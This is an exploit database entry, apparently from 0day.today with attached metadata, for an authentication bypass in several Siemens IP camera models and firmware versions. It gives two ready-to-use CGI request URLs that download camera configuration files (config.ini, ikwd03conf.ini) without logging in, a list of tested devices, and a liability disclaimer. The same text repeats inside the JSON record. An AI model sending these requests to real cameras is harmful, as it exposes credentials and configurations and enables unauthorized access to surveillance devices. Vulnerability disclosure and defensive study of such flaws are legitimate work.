ID 1337DAY-ID-25275 Type zdt Reporter Todor Donev Modified 2016-08-19T00:00:00
Description
Exploit for cgi platform in category web applications
#
#
# Multiple SIEMENS IP Cameras auth bypass configuration download
#
# Tested:
# SIEMENS IP Camera CCID1410-ST X.1.0.24
# SIEMENS IP Camera CCMW1025 x.2.2.1798
# SIEMENS IP Camera CCMS2025 x.2.2.1798
# SIEMENS IP Camera CVMS2025-IR x.2.2.1798
# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458
# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1
# SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58
#
# ...and more, more devices who use same firmware
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
http://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini
# 0day.today [2018-03-14] #
{"id": "1337DAY-ID-25275", "lastseen": "2018-03-14T06:40:09", "viewCount": 11, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2018-03-14T06:40:09", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/CRYSTAL_REPORTS_PRINTCONTROL", "MSF:EXPLOIT/UNIX/WEBAPP/MITEL_AWC_EXEC", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/XION_M3U_SEHBOF", "MSF:EXPLOIT/LINUX/HTTP/DLINK_HNAP_LOGIN_BOF"]}], "modified": "2018-03-14T06:40:09", "rev": 2}, "vulnersScore": -0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/25275", "description": "Exploit for cgi platform in category web applications", "title": "SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download", "cvelist": [], "sourceData": "# \r\n#\r\n# Multiple SIEMENS IP Cameras auth bypass configuration download\r\n#\r\n# Tested: \r\n# SIEMENS IP Camera CCID1410-ST X.1.0.24\r\n# SIEMENS IP Camera CCMW1025 x.2.2.1798\r\n# SIEMENS IP Camera CCMS2025 x.2.2.1798\r\n# SIEMENS IP Camera CVMS2025-IR x.2.2.1798\r\n# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458\r\n# SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1\r\n# SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58\r\n# \r\n# ...and more, more devices who use same firmware\r\n#\r\n# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>\r\n# http://www.ethical-hacker.org/\r\n# https://www.facebook.com/ethicalhackerorg\r\n# \r\n# Disclaimer:\r\n# This or previous programs is for Educational\r\n# purpose ONLY. Do not use it without permission.\r\n# The usual disclaimer applies, especially the\r\n# fact that Todor Donev is not liable for any\r\n# damages caused by direct or indirect use of the\r\n# information or functionality provided by these\r\n# programs. The author or any Internet provider\r\n# bears NO responsibility for content or misuse\r\n# of these programs or any derivatives thereof.\r\n# By using these programs you accept the fact\r\n# that any damage (dataloss, system crash,\r\n# system compromise, etc.) caused by the use\r\n# of these programs is not Todor Donev's\r\n# responsibility.\r\n# \r\n# Use them at your own risk!\r\n#\r\n# \r\n \r\nhttp://TARGET/cgi-bin/chklogin.cgi?file=config.ini\r\nhttp://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini\n\n# 0day.today [2018-03-14] #", "published": "2016-08-19T00:00:00", "references": [], "reporter": "Todor Donev", "modified": "2016-08-19T00:00:00", "href": "https://0day.today/exploit/description/25275"}